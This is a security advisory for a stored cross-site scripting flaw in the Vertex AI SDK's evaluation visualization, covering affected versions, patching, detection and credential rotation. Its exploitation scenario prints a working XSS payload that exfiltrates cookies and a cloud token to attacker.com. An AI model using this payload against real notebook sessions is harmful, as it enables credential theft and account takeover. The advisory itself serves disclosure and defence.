If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| google-cloud-aiplatform | pip | >= 1.98.0, < 1.131.0 | 1.131.0 |
Do you use google-cloud-aiplatform? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform. 2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data. 3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization. 4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation. 5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions. 6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.
Exploitation Scenario
An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
Weaknesses (CWE)
References
- docs.cloud.google.com/support/bulletins
- github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud
- github.com/advisories/GHSA-qv8j-hgpc-vrq8
- github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480
- github.com/googleapis/python-aiplatform/releases/tag/v1.131.0
- nvd.nist.gov/vuln/detail/CVE-2026-2472